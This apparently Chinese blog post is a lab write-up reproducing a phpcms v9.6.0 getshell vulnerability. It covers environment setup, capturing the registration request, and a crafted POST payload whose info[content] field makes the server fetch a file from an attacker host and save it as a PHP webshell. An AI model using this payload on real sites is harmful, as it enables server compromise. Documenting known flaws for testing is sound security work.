欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

phpcms v9.6.0版本getshell测试

程序员文章站 2022-07-15 14:37:45
...

其实这个漏洞是4月初的时候了。

今天有空重新记录一下。

一、环境搭建:

需要 phpcms V9.6.0安装包/ phpstudy

phpcms v9.6.0安装包下载地址:http://download.csdn.net/download/qq1124794084/9971392

安装PHPstudy完成后,直接把phpcms V9.6.0解压到WWW目录下

然后浏览器访问:http://ip/phpcms

进行安装,安装都是傻瓜式的操作,填写好数据库用户名密码就可以了。。phpstudy的mysql数据库root密码默认为root

安装完成后需要在后台生成一下首页,才能访问。


二、POC上传shell

1.进入漏洞触发的页面-----注册页面

按照格式随便填写。

phpcms v9.6.0版本getshell测试

2.填写完毕以后,开启抓包工具,我用的是fiddler,F11截包,点击提交注册按钮。

抓到数据包如下:

phpcms v9.6.0版本getshell测试

3.创建好本地或者服务器的webshell

我在自己本地写了个phpinfo.php

根据过滤规则我们先把它改名为phpinfo.txt

并启动本地的web服务器


4.POC上传shell

构造POC

siteid=1&modelid=1&username=00924324&password=123456789&pwdconfirm=123456789&aaa@qq.com&nickname=i09dfdf&info[content]=href=http://192.168.10.12/phpinfo.txt?.php#.jpg&dosubmit=1&protocol=


注意modelid要等于1

原来的info[Birthday]改为info[content]这样才能报错,把shell的路径暴露出来

info后面跟的是shell的地址

phpcms v9.6.0版本getshell测试

这样我们浏览器打开webshell地址

phpcms v9.6.0版本getshell测试

上传成功。